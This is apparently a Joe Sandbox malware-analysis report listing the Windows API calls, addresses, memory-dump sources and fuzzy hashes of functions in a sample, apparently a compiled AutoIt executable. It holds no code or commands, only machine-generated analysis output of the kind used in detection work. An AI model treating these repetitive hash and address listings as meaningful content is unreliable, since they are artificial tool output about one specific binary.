                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                                                        • String ID:
                                                                        • API String ID: 1640429340-0
                                                                        • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                        • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                        • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                        • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                        APIs
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • _wcslen.LIBCMT ref: 004438CD
                                                                        • _wcslen.LIBCMT ref: 004438E6
                                                                        • _wcstok.LIBCMT ref: 004438F8
                                                                        • _wcslen.LIBCMT ref: 0044390C
                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                        • _wcstok.LIBCMT ref: 00443931
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 3632110297-0
                                                                        • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                        • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                        • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                        • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                        • String ID:
                                                                        • API String ID: 752480666-0
                                                                        • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                        • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                        • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                        • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                        • String ID:
                                                                        • API String ID: 3275902921-0
                                                                        • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                        • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                        • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                        • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                        • String ID:
                                                                        • API String ID: 3275902921-0
                                                                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                        APIs
                                                                        • SendMessageW.USER32 ref: 004555C7
                                                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                        • String ID:
                                                                        • API String ID: 3691411573-0
                                                                        • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                        • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                        • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                        • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                        APIs
                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                        • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                        • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                        • EndPath.GDI32(?), ref: 004472D6
                                                                        • StrokePath.GDI32(?), ref: 004472E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                        • String ID:
                                                                        • API String ID: 372113273-0
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0044CC6D
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                        Similarity
                                                                        • API ID: CapsDevice$Release
                                                                        • String ID:
                                                                        • API String ID: 1035833867-0
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 0041708E
                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                        • __amsg_exit.LIBCMT ref: 004170AE
                                                                        • __lock.LIBCMT ref: 004170BE
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                        • _free.LIBCMT ref: 004170EE
                                                                        • InterlockedIncrement.KERNEL32(02F32D00), ref: 00417106
                                                                        Similarity
                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                        • String ID:
                                                                        • API String ID: 3470314060-0
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                        Similarity
                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                        • String ID:
                                                                        • API String ID: 442100245-0
                                                                        APIs
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                        • _wcslen.LIBCMT ref: 0045F94A
                                                                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 621800784-4108050209
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • SetErrorMode.KERNEL32 ref: 004781CE
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                        • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                        • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                        • String ID: \VH
                                                                        • API String ID: 3884216118-234962358
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails$Wu
• API String ID: 145871493-136108093
APIs
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
• IsMenu.USER32(?), ref: 0044854D
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
• DrawMenuBar.USER32 ref: 004485AF
Strings
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
• SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
Strings
Similarity
• API ID: MessageSend$_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 1589278365-1403004172
APIs
Strings
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 0044337D
Strings
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
Strings
Similarity
• API ID:
• String ID: SysAnimate32
• API String ID: 0-1011021900
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
• GetFocus.USER32 ref: 0046157B
  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
• GetClassNameW.USER32(?,?,00000100), ref: 004615C4
• EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
• __swprintf.LIBCMT ref: 00461608
Strings
Similarity
• API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
• String ID: %s%d
• API String ID: 2645982514-1110647743
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 0047584D
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
• CloseHandle.KERNEL32(00000000), ref: 00475A4D
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                        Similarity
                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                        • String ID:
                                                                        • API String ID: 15295421-0
                                                                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 004563A6
                                                                        • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                        • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                        • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 3539004672-0
                                                                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                        APIs
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                        Similarity
                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                        • String ID:
                                                                        • API String ID: 327565842-0
                                                                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                        APIs
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                        Similarity
                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                        • String ID:
                                                                        • API String ID: 2832842796-0
                                                                        • Opcode ID: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                        • Opcode Fuzzy Hash: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                        Similarity
                                                                        • API ID: Enum$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 2095303065-0
                                                                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                        Similarity
                                                                        • API ID: RectWindow
                                                                        • String ID:
                                                                        • API String ID: 861336768-0
                                                                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                        APIs
                                                                        • SendMessageW.USER32 ref: 00449598
                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                        • _wcslen.LIBCMT ref: 0044960D
                                                                        • _wcslen.LIBCMT ref: 0044961A
